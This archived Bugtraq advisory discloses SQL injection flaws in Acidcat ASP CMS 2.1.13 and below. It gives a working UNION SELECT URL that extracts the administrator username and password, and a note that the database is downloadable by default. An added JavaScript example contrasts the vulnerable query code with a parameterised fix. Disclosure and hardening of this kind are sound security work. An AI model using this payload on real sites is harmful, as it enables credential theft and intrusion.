
Bugtraq mailing list archives

Acidcat ASP CMS Multiple Vulnerabilities
From: h e <het_ebadi () yahoo com>
Date: Tue, 20 Dec 2005 09:03:34 -0800 (PST)


Acidcat CMS is a web site and simple content
management system that can be administered via a web
It is free for non-commercial use. Acidcat CMS is also
an open source product.
The product has been found to contain multiple
security vulnerabilities allowing a remote attacker to
find administrator username and password.
Acidcat ASP CMS: http://www.acidcat.com

The information has been provided by Hamid Ebadi
(Hamid Network Security Team): admin () hamid ir
The original article can be found at:

Vulnerable Systems:
 * Acidcat CMS v 2.1.13 and below
Example:
The following URL can be used to trigger an SQL
injection vulnerability in the main_content.asp page:

Microsoft OLE DB Provider for ODBC Drivers error
[Microsoft][ODBC Microsoft Access Driver] Syntax error
(missing operator) in query expression 'ID = 1'''. 
/main_content.asp, line 16 

Vulnerable Code:
The following lines in main_content.asp
Item.Source = "SELECT * FROM Item WHERE ID = "+
Item__MMColParam.replace(/'/g, "''") + "";

The following URL illustrates how you can easily
find the administrator username and password:

http://localhost/acidcat/default.asp?ID=26 union
select 1,username,3,password,5,6 from Configuration
The base path of the login is:

Database Download:
The database can be downloaded over the web (default
installation). It can be found on
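
Added example (not part of the original post and not Acidcat's code): the quoted main_content.asp line doubles single quotes but concatenates ID into a numeric context, so the escaping does not constrain the value. The hardened form validates ID as an integer and binds it as a parameter. The function names, the 9-digit bound and the "?" placeholder style are assumptions.

```javascript
// Hypothetical helper names; only the query text comes from the advisory.

// Same construction as the main_content.asp line quoted in the advisory:
// single quotes are doubled, but the value lands in a numeric context
// with no surrounding quotes, so the escaping constrains nothing.
function buildQueryVulnerable(rawId) {
  return "SELECT * FROM Item WHERE ID = " + rawId.replace(/'/g, "''") + "";
}

// Strict allow-list for an integer key: digits only, bounded length.
// Returns a Number, or null when the input is not a plain integer.
function parseItemId(rawId) {
  if (typeof rawId !== "string" || !/^[0-9]{1,9}$/.test(rawId)) return null;
  return Number(rawId);
}

// Hardened form: validate first, then hand the value to the driver as a
// bound parameter instead of concatenating it into the SQL text.
function buildQueryHardened(rawId) {
  const id = parseItemId(rawId);
  if (id === null) return null; // caller should reject the request
  return { sql: "SELECT * FROM Item WHERE ID = ?", params: [id] };
}

// Constructed inputs; the third is the ID value shown in the advisory's URL.
const samples = [
  "26",
  "1'",
  "26 union select 1,username,3,password,5,6 from Configuration",
];

for (const s of samples) {
  console.log(JSON.stringify(s));
  console.log("  vulnerable:", buildQueryVulnerable(s));
  console.log("  hardened:  ", JSON.stringify(buildQueryHardened(s)));
}
```

The second sample reproduces the query expression from the ODBC error message in the post; the third passes through the quote-doubling unchanged and is rejected only by the integer check.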

